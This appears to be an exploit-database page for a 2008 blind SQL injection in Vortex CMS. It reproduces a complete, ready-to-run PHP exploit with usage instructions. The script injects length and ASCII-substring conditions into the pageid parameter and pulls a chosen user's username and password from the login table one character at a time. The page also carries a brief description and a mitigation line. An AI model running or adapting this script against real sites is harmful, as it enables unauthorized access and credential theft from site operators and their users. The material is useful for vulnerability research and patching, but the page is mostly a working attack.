header-logo
Suggest Exploit
vendor:
Vortex CMS
by:
Lidloses_Auge
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vortex CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vortex CMS – Blind SQL Injection Exploit

Vortex CMS is vulnerable to Blind SQL Injection. This exploit allows an attacker to extract the username and password of a user from the database. The exploit works by sending a specially crafted HTTP request to the vulnerable server and then analyzing the response. The exploit is coded in PHP and requires the target URL, page ID and user ID as parameters.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#   Vortex CMS - Blind SQL Injection Exploit     
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco
#                                   GPM, Free-Hack
#      Date:                        10.05.2008
#
###############################################################
#                                                             
#      Usage: php '.$argv[0].' [Target] [Page ID] [User ID]
#      Example for "http://www.site.com/cms/index.php?pageid=1"
#      => php '.$argv[0].' http://www.site.com/cms/ 1 1
#                                                             
###############################################################
');
if ($argc > 1) {
print_r('
');
   echo 'Searching for Admin: ';
   for($i=1; $i <= 50; $i++) { 
      $temp1 = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((select+username+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*');
      if (strpos($temp1,'Sorry, the page you requested could not be found.') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=46; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(substring((select+username+from+system_users_logins+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'/*');
         if (strpos($temp,'Sorry, the page you requested could not be found.') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 64;
         }
      }
   }
print_r('
');
   echo 'Searching for Password: ';
   for($i=1; $i <= 50; $i++) { 
      $temp1 = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+length((select+password+from+system_users_logins+where+id='.$argv[3].'))='.$i.'/*');
      if (strpos($temp1,'Sorry, the page you requested could not be found.') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=46; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?pageid='.$argv[2].'\'and+ascii(substring((select+password+from+system_users_logins+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'/*');
         if (strpos($temp,'Sorry, the page you requested could not be found.') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 64;
         }
      }
   }
}
?>

# milw0rm.com [2008-05-11]

Navigation

Suggest Exploit

Services By CQR